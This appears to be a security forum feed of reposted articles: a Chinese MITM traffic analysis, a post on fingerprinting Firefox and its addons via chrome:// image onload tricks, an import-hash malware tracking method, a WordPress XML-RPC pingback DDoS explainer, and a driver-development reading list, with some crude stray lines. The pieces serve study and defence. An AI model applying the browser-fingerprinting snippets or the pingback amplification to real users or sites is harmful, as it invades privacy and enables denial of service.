fast they are. The fast response times also indicate that the machine performing the MITM is located fairly close to the network at Peking University. Even though the machine performing the MITM was very quick at performing the TCP tree-way handshake we noticed that the application layer communication was terribly slow. The specification for the TLS handshake (RFC 2246) defines that a ClientHello message should be responded to with a ServerHello. Google typically send their ServerHello response almost instantly, i.e. the response is received after one round-trip time (150ms in this case). However, in the analyzed captures we noticed ServerHello response times of around 500ms. X.509 Certificate analysis We extracted the X.509 certificates from the two capture files to .cer files using NetworkMiner. We noticed that both users received identical certificates, which were both self signed for “google.com”. The fact that the MITM used a self signed certificate makes the attack easily detectable even for the non-technical user, since the web browser will typically display a warning about the site not being trusted. Additionally the X.509 certificate was created for ”google.com” rather than ”*.google.com”. This is an obvious miss from the MITM'ers side since they were attempting to MITM traffic to ”www.google.com” but not to ”google.com”. NetworkMiner showing list of X.509 certificates extracted from the two PCAP files Certificate SHA1 fingerprint: f6beadb9bc02e0a152d71c318739cdecfc1c085d Certificate MD5 fingerprint: 66:D5:D5:6A:E9:28:51:7C:03:53:C5:E1:33:14:A8:3B A copy of the fake certificate is available on Google drive thanks to GreatFire.org. Conclusions All evidence indicates that a MITM attack is being conducted against traffic between China’s nationwide education and research network CERNET and Google. It looks as if the MITM is carried out on a network belonging to AS23911, which is the outer part of CERNET that peers with all external networks. This network is located in China, so we can conclude that the MITM was being done within the country. It's difficult to say exactly how the MITM attack was carried out, but we can dismiss DNS spoofing as the used method. A more probable method would be IP hijacking; either through a BGP prefix hijacking or some form of packet injection. However, regardless of how they did it the attacker would be able to decrypt and inspect the traffic going to Google. We can also conclude that the method used to perform the MITM attack was similar to the Chinese MITM on GitHub, but not identical. Sursa: Analysis of Chinese MITM on Google - NETRESEC Blog
-
Dirty Browser Enumeration Tricks – Using chrome:// and about:
Nytro posted a topic in Securitate web
Dirty Browser Enumeration Tricks – Using chrome:// and about: to Detect Firefox & Plugins After playing around with some of the cool Firefox Easter eggs I had an interesting thought about the internal chrome:// resources in the Firefox web browser. In a previous post I found that I could access local Firefox resources such as style-sheets, images, and other local content in any public web page. For example, if you’re using the Firefox web browser, you know what the following image is: For everyone else, the above image is broken. This is because the image is actually a link to “about:logo”. It’s a reference to a local resource only found in Firefox flavored web browsers. When the image is viewed in Chrome, Internet Explorer, or Safari, the reference doesn’t exist and the image link is broken. Alright, how about a consolation prize – what about this image? That may be cool, but it does beg the question – can we abuse this? Of course we can! Subverting Same Origin for Browser & Plugin Identification With a little bit of trickery we can use these local references to: 1. Identify Firefox with 100% accuracy 2. Identify any Firefox plugins with special “chrome.manifest” settings (to be covered below) This can be done by doing something like the following: <img src="about:logo" onload="alert('Browser is Firefox!')" /> [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]<img src="about:logo" onload="alert('Browser is Firefox!')" /> [/TD] [/TR] [/TABLE] Simply enough, if you get a JavaScript alert – you’re using Firefox! (Interestingly enough, this doesn’t work on the Tor browser. Perhaps due to the NoScript addon?) The same trick can be used to identify some plugins as well. For example if you are using the “Resurrect Pages” plugin, you can see the following image: Using the same tactic as above, we can enumerate the install of “Resurrect Pages” via the following: <img src="chrome://resurrect/skin/cacheicons/google.png" onload="alert('Browser has Resurrect Pages installed!')" /> [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]<img src="chrome://resurrect/skin/cacheicons/google.png" onload="alert('Browser has Resurrect Pages installed!')" /> [/TD] [/TR] [/TABLE] So, how do we know what plugins this works for? From the Mozilla Developer Network: “Chrome resources can no longer be referenced from within <img>, <script>, or other elements contained in, or added to, content that was loaded from an untrusted source. This restriction applies to both elements defined by the untrusted source and to elements added by trusted extensions. If such references need to be explicitly allowed, set the contentaccessible flag to yes to obtain the behavior found in older versions of Firefox.” https://developer.mozilla.org/en-US/docs/Chrome_Registration To put it short, if the plugin has a line like the following in it’s “chrome.manifest” file: content packagename chrome/path/ contentaccessible=yes [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]content packagename chrome/path/ contentaccessible=yes [/TD] [/TR] [/TABLE] Then the plugin’s resources can be included just like any other web resource. Which means if the plugin has any style-sheets, images, or JavaScript – it can be enumerated! When I was first investigating this behavior I thought I was original, but of course others have attempted this as well: Firefox add-on detection with Javascript | WebDevWonders.com Detecting FireFox Extentions ha.ckers.org web application security lab Oh well, let’s do it on a bigger scale! Gathering Firefox Addon Analytics In order to get a comprehensive list of which addons had set this “contentaccessible” flag to “yes”, I scraped ~12K addons from the Firefox Addons website. Each addon XPI was parsed for it’s “chrome.manifest” file for the “contentaccessible=yes” flag. If the flag existed, the proper chrome URI was generated for each file in the content path. These path’s were then used to construct a JavaScript scanner that works by making references to these chrome URIs and checking if they are valid via the “onload” event. The completed scanner: After taking analytics on all of these addons it was found that only a mere ~400 had the proper contentaccessible flag combined with detectable resources. By detectable resources I mean resources such as JavaScript, CSS, or images that could be embedded and detected. This means that out of all the addons, only about ~3.3% could be detected in this manor. Although there are other methods of detecting the presence of Firefox addons. For example, despite the Adblock Plus addon not having a contentaccessible flag, it can be detected by attempting to make a script or image reference to a blocked domain. If the reference fails to load on a file that is perfectly valid, we know it is being blocked by Adblock Plus or some other anti advertisement addon. In the same manor we could fingerprint which Adblock Plus list is being used. The detection of addons is quite quick and only takes a few seconds to complete. This is due to the fact that the references are local, so they aren’t being grabbed off a webserver but directly from the browser itself. To try the scanner out in your Firefox browser, see the following link: Firefox Plugin Detector For other hackers or web developers, a full JSON dump of the data collected is available here (warning, big file!). This contains data on publicly accessible chrome:// URIs as well as basic information on every addon collected. I’d link to the dump of all the Firefox addon XPIs downloaded but it goes well over a gigabyte in size and I’m not sure if re-hosting addons is allowed. As a final point, being able to access this data has another advantage. If any information is leaked in the JavaScript resources such as local filesystem references, OS information, etc, this could be included and potentially could leak sensitive information. After checking many of the chrome:// resources inside Firefox itself I found that most references to the browser’s version or other information have been crudely commented out. I assume because someone else has attempted this style of enumeration before. Not to mention if the content is vulnerable to XSS, you have remote code execution due to the JavaScript running at the same level as a Firefox addon. Until next time, -mandatory Sursa: Dirty Browser Enumeration Tricks - Using chrome:// and about: to Identify Firefox & Plugins | The Hacker Blog -
UCLA, Cisco & more join forces to replace TCP/IP Named Data Networking Consortium makes its debut in LA By Bob Brown Sep 4, 2014 12:05 PM Big name academic and vendor organizations have unveiled a consortium this week that's pushing Named Data Networking (NDN), an emerging Internet architecture designed to better accommodate data and application access in an increasingly mobile world. The Named Data Networking Consortium members, which include universities such as UCLA and China's Tsinghua University as well as vendors such as Cisco and VeriSign, are meeting this week at a two-day workshop at UCLA to discuss NDN's promise for scientific research. Big data, eHealth and climate research are among the application areas on the table. The NDN effort has been backed in large part by the National Science Foundation, which has put more than $13.5 million into it since 2010. Since that time, participating organizations have somewhat quietly been working on new protocols and specifications, including a new packet format, that have been put through their paces in a testbed that spans from the United States to Asia. Their aim is to put forth an Internet architecture that's more secure, able to support more bandwidth and friendlier to app developers. Cryptographic authentication, flow balance and adaptive routing/forwarding are among the key underlying principles. UCLA has been particularly involved in the NDN effort, and the consortium has been organized by researchers from the UCLA Henry Samueli School of Engineering and Applied Science. Interestingly, among those involved is Jeff Burke, Assistant Dean for Technology and Innovation at the UCLA School of Theater, Film and Television, emphasizing the interdisciplinary approach being taken with NDN. Co-leaders of the project are Lixia Zhang, UCLA’s Jonathan B. Postel Chair in Computer Science, and Van Jacobson, an Internet Hall of Famer and adjunct professor at UCLA. NDN has its roots in content-centric networking, a concept that Jacobson started at Xerox PARC. Other participants are in charge of various aspects of the project: Washington University in St. Louis, for instance, is spearheading scalable NDN forwarding technologies and managing the global testbed. It's no surprise to see Cisco getting into NDN early either (it costs $25K for commercial entities to join, though is free for certain academic institutions). David Oran, a Cisco Fellow and VoIP expert, said in a statement that the consortium "will help evolve NDN by establishing a multifaceted community of academics, industry and users. We expect this consortium to be a major help in advancing the design, producing open-source software, and fostering standardization and adoption of the technology.” Sursa: Cisco, UCLA & more launch Named Data Networking Consortium
-
Tracking Malware with Import Hashing By Mandiant on January 23, 2014 Tracking threat groups over time is an important tool to help defenders hunt for evil on networks and conduct effective incident response. Knowing how certain groups operate makes for an efficient investigation and assists in easily identifying threat actor activity. At Mandiant, we utilize several methods to help identify and correlate threat group activity. A critical piece of our work involves tracking various operational items such as attacker infrastructure and email addresses. In addition, we track the specific backdoors each threat group utilizes – one of the key ways to follow a group’s activities over time. For example, some groups may favor the SOGU backdoor, while others use HOMEUNIX. One unique way that Mandiant tracks specific threat groups’ backdoors is to track portable executable (PE) imports. Imports are the functions that a piece of software (in this case, the backdoor) calls from other files (typically various DLLs that provide functionality to the Windows operating system). To track these imports, Mandiant creates a hash based on library/API names and their specific order within the executable. We refer to this convention as an “imphash” (for “import hash”). Because of the way a PE’s import table is generated (and therefore how its imphash is calculated), we can use the imphash value to identify related malware samples. We can also use it to search for new, similar samples that the same threat group may have created and used. Though Mandiant has been leveraging this technique for well over a year internally, we aren’t the first to publicly discuss this. An imphash is a powerful way to identify related malware because the value itself should be relatively unique. This is because the compiler’s linker generates and builds the Import Address Table (IAT) based on the specific order of functions within the source file. Take the following example source code: #include <windows.h>#include <stdio.h> #include <stdlib.h> #include <wininet.h> #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "wininet.lib") int makeMutexA() { CreateMutexA(NULL, FALSE, "TestMutex"); return 0; } int makeMutexW() { CreateMutexW(NULL, FALSE, L"TestMutex"); return 0; } int makeUserAgent() { HANDLE hInet=0, hConn=0; char buf[sizeof(struct hostent)] = {0}; hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent)); return 0; } int main(int argc, char *argv[]) { makeMutexA(); makeMutexW(); makeUserAgent(); return 0; } When that source file is compiled, the resulting import table looks as follows: ws2_32.dll ws2_32.dll.WSAAsyncGetHostByName wininet.dll wininet.dll.InternetOpenAwininet.dll.InternetConnectA kernel32.dll kernel32.dll.InterlockedIncrement kernel32.dll.IsProcessorFeaturePresent kernel32.dll.GetStringTypeW kernel32.dll.MultiByteToWideChar kernel32.dll.LCMapStringW kernel32.dll.CreateMutexA kernel32.dll.CreateMutexW kernel32.dll.GetCommandLineA kernel32.dll.HeapSetInformation kernel32.dll.TerminateProcess Imphash: 0c6803c4e922103c4dca5963aad36ddf We abbreviated the table to save space, but the red/bolded APIs are the ones referenced in the source code. Note the order in which they appear in the table, and compare that to the order in which they appear in the source file. If an author were to change the order of the functions and/or the order of the API calls in the source code, this would in turn affect the compiled import table. Take the previous example, modified: #include <windows.h>#include <stdio.h> #include <stdlib.h> #include <wininet.h> #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "wininet.lib") int makeMutexW() { CreateMutexW(NULL, FALSE, L"TestMutex"); return 0; } int makeMutexA() { CreateMutexA(NULL, FALSE, "TestMutex"); return 0; } int makeUserAgent() { HANDLE hInet=0, hConn=0; char buf[sizeof(struct hostent)] = {0}; hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent)); return 0; } int main(int argc, char *argv[]) { makeMutexA(); makeMutexW(); makeUserAgent(); return 0; } In this example, we have reversed the order of makeMutexW and makeMutexA, and of InternetConnectA and InternetOpenA. (Note that this would be an invalid sequence of API calls, but we use it here to illustrate the point.) Below is the import table generated from this modified source code (again abbreviated); note the changes when compared to the original IAT, above, as well as the different imphash value: ws2_32.dll ws2_32.dll.WSAAsyncGetHostByName wininet.dll wininet.dll.InternetConnectAwininet.dll.InternetOpenA kernel32.dll kernel32.dll.InterlockedIncrement kernel32.dll.IsProcessorFeaturePresent kernel32.dll.GetStringTypeW kernel32.dll.MultiByteToWideChar kernel32.dll.LCMapStringW kernel32.dll.CreateMutexWkernel32.dll.CreateMutexA kernel32.dll.GetCommandLineA kernel32.dll.HeapSetInformation kernel32.dll.TerminateProcess Imphash: b8bb385806b89680e13fc0cf24f4431e The final example shows how the ordering of included files at compile time will affect the resulting IAT (and thus the resulting imphash value). We’ll expand on our original example by adding files imphash1.c and imphash2.c, to be included with our original source file imphash.c: -- imphash1.c -- int makeNamedPipeA(){ HANDLE ph = CreateNamedPipeA("\\\\.\\pipe\\test_pipe", PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 128, 64, 200, NULL); return 0; } -- imphash2.c -- int makeNamedPipeW() { HANDLE ph2 = CreateNamedPipeW(L"\\\\.\\pipe\\test_pipeW", PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 128, 64, 200, NULL); return 0; } -- imphash.c -- #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <wininet.h> #include “imphash1.h” #include “imphash2.h” #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "wininet.lib") int makeMutexW() { CreateMutexW(NULL, FALSE, L"TestMutex"); return 0; } int makeMutexA() { CreateMutexA(NULL, FALSE, "TestMutex"); return 0; } int makeUserAgent() { HANDLE hInet = 0, hConn = 0; char buf[sizeof(struct hostent)] = {0}; hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent)); return 0; } int main(int argc, char *argv[]) { makeMutexA(); makeMutexW(); makeUserAgent(); makeNamedPipeA(); makeNamedPipeW(); return 0; } Using the following command to build the EXE: cl imphash.c imphash1.c imphash2.c /W3 /WX /link The resulting IAT is: ws2_32.dll ws2_32.dll.WSAAsyncGetHostByName wininet.dll wininet.dll.InternetConnectA wininet.dll.InternetOpenA kernel32.dll kernel32.dll.TlsFree kernel32.dll.IsProcessorFeaturePresent kernel32.dll.GetStringTypeW kernel32.dll.MultiByteToWideChar kernel32.dll.LCMapStringW kernel32.dll.CreateMutexW kernel32.dll.CreateMutexA kernel32.dll.CreateNamedPipeAkernel32.dll.CreateNamedPipeW kernel32.dll.GetCommandLineA kernel32.dll.HeapSetInformation kernel32.dll.TerminateProcess Imphash: 9129bdbc18cfd1aba498c94e809567d5 Changing the order of includes for imphash1.h and imphash2.h within the source file imphash.c will have no effect on the ordering of the IAT. However, changing the order of the files on the command line and recompiling will affect the IAT; note the re-ordering of CreateNamedPipeW and CreateNamedPipeA: cl imphash.c imphash2.c imphash1.c /W3 /WX /link ws2_32.dll ws2_32.dll.WSAAsyncGetHostByName wininet.dll wininet.dll.InternetConnectA wininet.dll.InternetOpenA kernel32.dll kernel32.dll.TlsFree kernel32.dll.IsProcessorFeaturePresent kernel32.dll.GetStringTypeW kernel32.dll.MultiByteToWideChar kernel32.dll.LCMapStringW kernel32.dll.CreateMutexW kernel32.dll.CreateMutexA kernel32.dll.CreateNamedPipeWkernel32.dll.CreateNamedPipeA kernel32.dll.GetCommandLineA kernel32.dll.HeapSetInformation kernel32.dll.TerminateProcess Imphash: c259e28326b63577c31ee2c01b25d3fa These examples show that both the ordering of functions within the original source code – as well as the ordering of source files at compile time – will affect the resulting IAT, and therefore the resulting imphash value. Because the source code is not organized the same way, two different binaries with exactly the same imports are highly likely to have different import hashes. Conversely, if two files have the same imphash value, they have the same IAT, which implies that the files were compiled from the same source code, and in the same manner. For packed samples, simple tools or utilities (with few imports and, based on their simplicity, likely compiled in the same way), the imphash value may not be unique enough to be useful for attribution. In other words, it may be possible for two different threat actors to independently generate tools with the same imphash based on those factors. However, for more complex and/or custom tools (like backdoors), where there are a sufficient number of imports present, the imphash should be relatively unique, and can therefore be used to identify code families that are structurally similar. While files with the same imphash are not guaranteed to originate from the same threat group (it’s possible, for example, for the files were generated by a common builder that is shared among groups) the files can at least be reasonably assumed to have a common origin and may eventually be attributable to a single threat group with additional corroborating information. Employing this method has given us great success for verifying attacker backdoors over a period of time and demonstrating relationships between backdoors and their associated threat groups. Mandiant has submitted a patch that enables the calculation of the imphash value for a given PE to Ero Carrera’s pefile (pefile - pefile is a Python module to read and work with PE (Portable Executable) files - Google Project Hosting). Example code: import pefile pe = pefile.PE(sys.argv[1]) print “Import Hash: %s” % pe.get_imphash() Mandiant uses an imphash convention that requires that the ordinals for a given import be mapped to a specific function. We’ve added a lookup for a couple of DLLs that export functions commonly looked up by ordinal to pefile. Mandiant’s imphash convention requires the following: Resolving ordinals to function names when they appear Converting both DLL names and function names to all lowercase Removing the file extensions from imported module names Building and storing the lowercased string . in an ordered list Generating the MD5 hash of the ordered list This convention is implemented in pefile.py version 1.2.10-139 starting at line 3618. If imphash values serve as relatively unique identifiers for malware families (and potentially for specific threat groups), won’t discussing this technique alert attackers and cause them to change their methods? Attackers would need to modify source code (in a way that did not affect the functionality of the malware itself) or change the file order at compile time (assuming the source code is spread across multiple files). While attackers could write tools to modify the imphash, we don’t expect many attackers to care enough to do this. We believe it is important to add imphash to the lexicon as a way to discuss malware samples at a higher level and to exchange information about attackers and threat groups. For example, incident responders can use imphash values to discuss malware without specifically disclosing which exact sample (specific MD5) is being discussed. Consider a scenario where an attacker compiles 30 variants of its backdoor with different C2 locations and campaign IDs and deploys them to various companies. If a blog post comes out stating that a specific MD5 was identified as part of a campaign, then based on that MD5 the attacker immediately knows what infrastructure (such as C2 domains or associated IP addresses) is at stake and which campaign may be in jeopardy. However, if the malware was identified just by its imphash value, it is possible that the imphash is shared across all 30 of the attacker’s variants. The malware is still identifiable by and can be discussed within the security community, but the attacker doesn’t know which specific samples have been identified or which parts of their infrastructure are in jeopardy. To demonstrate the effectiveness of this analysis method, we’ve decided to share the imphash values of a few malware families from the Mandiant APT1 report: [TABLE] [TR] [TH]Family Name[/TH] [TH]Import Hash[/TH] [TH]Total Imports[/TH] [TH]Number of matched Samples[/TH] [/TR] [TR] [TD]GREENCAT[/TD] [TD]2c26ec4a570a502ed3e8484295581989[/TD] [TD]74[/TD] [TD]23[/TD] [/TR] [TR] [TD]GREENCAT[/TD] [TD]b722c33458882a1ab65a13e99efe357e[/TD] [TD]74[/TD] [TD]18[/TD] [/TR] [TR] [TD]GREENCAT[/TD] [TD]2d24325daea16e770eb82fa6774d70f1[/TD] [TD]113[/TD] [TD]13[/TD] [/TR] [TR] [TD]GREENCAT[/TD] [TD]0d72b49ed68430225595cc1efb43ced9[/TD] [TD]100[/TD] [TD]13[/TD] [/TR] [TR] [TD]STARSYPOUND[/TD] [TD]959711e93a68941639fd8b7fba3ca28f[/TD] [TD]62[/TD] [TD]31[/TD] [/TR] [TR] [TD]COOKIEBAG[/TD] [TD]4cec0085b43f40b4743dc218c585f2ec[/TD] [TD]79[/TD] [TD]10[/TD] [/TR] [TR] [TD]NEWSREELS[/TD] [TD]3b10d6b16f135c366fc8e88cba49bc6c[/TD] [TD]77[/TD] [TD]41[/TD] [/TR] [TR] [TD]NEWSREELS[/TD] [TD]4f0aca83dfe82b02bbecce448ce8be00[/TD] [TD]80[/TD] [TD]10[/TD] [/TR] [TR] [TD]TABMSGSQL[/TD] [TD]ee22b62aa3a63b7c17316d219d555891[/TD] [TD]102[/TD] [TD]9[/TD] [/TR] [TR] [TD]WEBC2[/TD] [TD]a1a42f57ff30983efda08b68fedd3cfc[/TD] [TD]63[/TD] [TD]25[/TD] [/TR] [TR] [TD]WEBC2[/TD] [TD]7276a74b59de5761801b35c672c9ccb4[/TD] [TD]52[/TD] [TD]13[/TD] [/TR] [/TABLE] We calculated the above malware families and corresponding imphash values over the set of malware from the Mandiant APT1 report released in February 2013. Using the imphash method described above, we calculated imphash values over all the samples, and then counted the total number of samples that matched on each imphash. Using 356 total samples from the report, we were able to identify 11 imphash values that provided significant coverage of their respective families. Pivoting from these imphash values, we were able to identify additional malware samples that further analysis showed were part of the same malware families and attributable to the same threat group. Imphash analysis, like any other method, has its limitations and should not be considered a single point of success. Just because two binaries have the same imphash value does not mean they belong to the same threat group, or even that they are part of the same malware family (though there is an increased likelihood that this is the case). Imphash analysis is a low-cost, efficient and valuable way to triage potential malware samples and expand discovery by identifying “interesting” samples that merit further analysis. The imphash value gives analysts another pivot point when conducting discovery on threat groups and their tools. Employing this method can also yield results in tracking and verifying attacker backdoors over time, and it can assist in exposing relationships between backdoors and threat groups. Happy Hunting! Sursa: https://www.mandiant.com/blog/tracking-malware-import-hashing/
-
Security issues in WordPress XML-RPC DDoS Explained G_Victor| September 4, 2014 A number of months ago a DDoS attack against a website used a functionality in all WordPress sites since 2005 as an amplification vector. According to one report more than 162,000 WordPress Sites sent requests to the target. What is this DDoS? WordPress has a feature that can send requests to another WordPress site. This function has been abused for several years and just a few months ago a DDoS attack was mounted again using the XML-RPC feature to amplify the Pingbacks to an unsuspected target. WordPress Prevelance WordPress is everywhere. About 22% of all sites on the Internet are WordPress sites according to Akamai’s State of the Internet Q1 2014 Report. It powers sites small to large. What is it? WordPress and XML-RPC WordPress is a Content Management System for blogging using plugin architecture and templates. XML-RPC is a specification explaining how a HTTP-POST request and XML as the encoding allows software running on different operating systems, in different environments to make procedure calls over the Internet. This feature has been available in WordPress since version 3.5. An administrator can manage almost any aspect of the WordPress installation from any application that implements XMLRPC such as a mobile device. Users, posts, pages or tags can be created, modified and deleted by administrators. How is it used? For Good. According to the specification this is the minimal requirements to receive a list of methods WordPress supports: A list that uses the XML-RPC WordPress API can be found here XML-RPC WordPress API « WordPress Codex The Attack. What Is Pingback And How Does It Work? One such method is pingback.ping, which is a feature that links one post from one site, to another post in another site. Another way to put it is that, SiteA is notified that SiteB has linked back to it. The advantage of this is that SiteA increases its credibility by most search engines standards and SiteB cites authorship. How Can It Be Abused? DDoS Attack? Even though this “bug” was documented in 2007 (https://core.trac.wordpress.org/ticket/4137), and WordPress has attempted to reduce the vulnerability of the attack, in March 2014, more than 160,000 WordPress site used this amplification technique to perform a DDoS attack against a single site. All that was necessary was the source and target URI. The Taxonomy Of The Attack To craft the attack simply POST a request like this: With this call the Target receives a GET request to the non-existent page forcing a full page reload and taking away resources needed for legitimate users. If many WordPress sites all point to the same site, the Target will experience a DDoS. The Source can be any URL. Defend Yourselves A WordPress site owner can defend against being used as pivot point in launching a DDoS by upgrading to the latest WordPress, either on the Dashboard or download it here. https://wordpress.org/latest.zip About HP Fortify on Demand HP Fortify on Demand is a cloud-based application security testing solution. We perform multiple types of manual and automated application security testing, including web assessments, mobile application security assessments, thick client testing, and ERP testing, etc. We do it both statically and dynamically, both in the cloud and on premise. Sursa: Security issues in WordPress XML-RPC DDoS Explaine... - HP Enterprise Business Community
-
Am modificat putin organizarea forumului pentru a scoate in evidenta tutorialele. Cred ca este destul de vizibil. Poate astfel o sa va atraga mai mult atentia.
-
Pizdelor.
-
De astăzi, stocarea datelor personale nu mai este permisă
Nytro replied to dicksi's topic in Stiri securitate
Muie garda. -
- 16 replies
-
- cont filelist
- filelist invitatii
-
(and 1 more)
Tagged with:
-
Device Driver Development for Beginners - Reloaded by Evilcry » Mon Oct 04, 2010 8:14 am Hi, This is just a little starter for people interested in starting Kernel-Mode Development By following an good thread on UIC forum, opened by a beginner that wanted to know how to start with Device Driver Development, I remembered that long time ago published a similar blog post on that subject. Now I'm going to Reload and Expand it. Development Tools 1. WDK/DDK - this is the proper Driver Development SDK given by Microsoft, latest edition can be dowloaded How to Get the WDK 2. Visual Studio 2008/2010 - you can also develop without VS, but I always prefer all the Comforts given by a such advanced IDE, especially in presence of complex device drivers. 3. DDKWizard - DDKWizard is a so-called project creation wizard (for VisualStudio) that allows you to create projects that use the DDKBUILD scripts from OSR (also available in the download section from this site). The wizard will give you several options to configure your project prior to the creation. You can download it Welcome to the DDKWizard homepage 4. VisualAssist - (Optional Tool) Visual Assist X provides productivity enhancements that help you read, write, navigate and refactor code with blazing speed in all Microsoft IDEs. You can Try/Buy it Visual Assist - a Visual Studio extension by Whole Tomato Software 5. VisualDDK - Develop and Debug drivers directly from VS, enjoy debugging your driver directly from Visual Studio, speeding up debugging ~18x for VMWare and ~48x for VirtualBox. Download and Step by Step Quick Start Guide VisualDDK - Quickstart 6. Virtual Machine - You need a Virtual Machine to perform efficient Driver Debugging, best options are VMWare or VirtualBox. Building a Driver Development Environment As you can see, a good comfortable Driver Development station is composed by a good amount of components, so we need an installation order. 1. Install your IDE - VisualStudio2008 or VisualStudio2010 2. Install WDK package 3. Install DDKWizard 4. Download and place ( usually into C:\WinDDK ) ddkbuild.cmd 5. By following DDKWizard pdf you will be driven to add an new Envirnment Variable directly releated to the OS version in which you are developing and successively add a reference of ddkbuild.cmd into VS IDE. DDWizard Manual is very well written. 6. After finishing DDKWizard integration you can test if your environment is correctly installed, by compilig your first driver. Steps are easy open VS and select DDKWizard templare (not EmptyDriver), you will see the skeleton of a Driver, all what you have to do is to Build Solution and Verify if No Compiling Errors occur, your station is correctly installed. 7. Install VirtualMachine 8. Integrate Debugging help of VisualDDK by following step by step quick start guide 9. Install Visual Assist (this can be done in every moment after VS Installation) Additional Tools * DeviceTree - This utility has two views: (a) one view that will show you the entire PnP enumeration tree of device objects, including relationships among objects and all the device's reported PnP characteristics, and ( a second view that shows you the device objects created, sorted by driver name. There is nothing like this utility available anywhere else. Download it Downloads:DeviceTree * IrpTracker - IrpTracker allows you to monitor all I/O request packets (IRPs) on a system without the use of any filter drivers and with no references to any device objects, leaving the PnP system entirely undisturbed. In addition to being able to see the path the IRP takes down the driver stack and its ultimate completion status, a detailed view is available that allows you to see the entire contents of static portion of the IRP and an interpreted view of the current and previous stack locations. Download it Downloads:IrpTracker * DebugMon - Displays DbgPrint messages generated by any driver in the system (or the OS itself) in the application window. Can be used either in local mode or can send the DbgPrint messages to another system via TCP/IP. Download it Downloads:DebugMon * DriverLoader - This GUI-based tool will make all the appropriate registry entries for your driver, and even allow you to start your driver without rebooting. It's even got a help file, for goodness sakes! If you write drivers, this is another one of those utilities that's a must have for your tool chest. x86 architecture. Dowload it Downloads:Driver Loader Now you have a full working Develop and Debug Station. As you should imagine, dealing with driver development implies working with at Kernel Mode, a task pretty challenging, delicate and complex. A badly written driver lead to OS Crash and/or dangerous bugs, just think about a driver used in mission-critical applications like Surgery, a bug or a crash could lead to extremely big dangers. The driver need to be: * Bug Free * Fault Tolerant * Ready to Endure all Stress Situations This could be done, only by the driver coder, with a large knowledge of following fields: * Hardware Architecture * Operating System Architecture * Kernel and User Mode Architecture * Rock Solid C language knowledge * Debugging Ability Here i'm going to enumerate necessary Documentation/Book/Etc. necessary to acheive a *good and solid* background and advanced knowledge about driver coding. Microsoft WDK Page: Windows 8.1: Download kits and tools Will give you informations about: 1. WDM ( Windows Driver Model) 2. WDF (Windows Driver Foundation) 3. IFS Kit (Installable FileSystem Kit) 4. Driver Debugging 5. Driver Stress Testing ( DriverVerifier tool ) PC Fundamentals: Windows Hardware Design Articles (Windows Drivers) Device Fundamentals: Windows Hardware Design Articles (Windows Drivers) This will give you an large view of 'what mean developing a driver' which components are touched and which aspects you need to know. It's also obviously necessary to have a Reference about kernel mode involved Functions and Mechanisms, the first best resource is always MSDN, here the starter link to follow MSDN->DDK http://msdn.microsoft.com/en-us/library ... 85%29.aspx How to start Learning As pointed out in the previous blog post, one of the best starting point, that will give you an on-fly-view of development topics is the Toby Opferman set of articles: Driver Development Part 1: Introduction to Drivers Driver Development Part 1: Introduction to Drivers - CodeProject Driver Development Part 2: Introduction to Implementing IOCTLs Driver Development Part 2: Introduction to Implementing IOCTLs - CodeProject Driver Development Part 3: Introduction to driver contexts Driver Development Part 3: Introduction to driver contexts - CodeProject Driver Development Part 4: Introduction to device stacks Driver Development Part 4: Introduction to device stacks - CodeProject Driver Development Part 5: Introduction to the Transport Device Interface Driver Development Part 5: Introduction to the Transport Device Interface - CodeProject Driver Development Part 6: Introduction to Display Drivers Driver Development Part 6: Introduction to Display Drivers - CodeProject It's really important to put in evicence MemoryManagement at KernelMode, the best starting point for these aspects are tutorials written by four-f; http://www.freewebs.com/four-f/ Handling IRPs: What Every Driver Writer Needs to Know http://download.microsoft.com/download/ ... a/IRPs.doc Book Resources Tutorial are a great starting point, but a solid understanding is given by a set of 'abstracts', emerges the necessity of a good Book Collection: Windows NT Device Driver Development (OSR Classic Reprints) http://www.amazon.com/Windows-Device-De ... 242&sr=8-2 Windows®-Internals-Including-Windows-PRO-Developer http://www.amazon.com/Windows%C2%AE-Int ... 160&sr=8-1 The Windows 2000 device driver book: a guide for programmers http://www.amazon.com/Windows-2000-Devi ... 0130204315 Windows NT/2000 Native API Reference http://www.amazon.com/Windows-2000-Nati ... 201&sr=8-1 Undocumented Windows 2000 Secrets Undocumented Windows 2000 Secrets Developing Drivers with WDF Developing Drivers with the Windows Driver Foundation: Reference Book (Windows Drivers) Windows NT File System Internals, A Developer's Guide Windows NT File System Internals*-*O'Reilly Media Web Resources The first and most important resource about Windows Driver Development is OSROnline: OSR Online - The Home Page for Windows Driver Developers I strongly suggest you to subscribe: 1. The NT Insider 2. NTDEV MailingList 3. NTFSD MailingList NDIS Developer's Reference NDIS Developer's Reference Information, Articles, and Free Downloads Resources The Undocumented Functions NTAPI Undocumented Functions Blog MSDN driver writing != bus driving - Site Home - MSDN Blogs Windows Vista Kernel Structures Windows Vista Kernel Structures Peter Wieland's thoughts on Windows driver development Pointless Blathering - Site Home - MSDN Blogs USB Driver Development Microsoft Windows USB Core Team Blog - Site 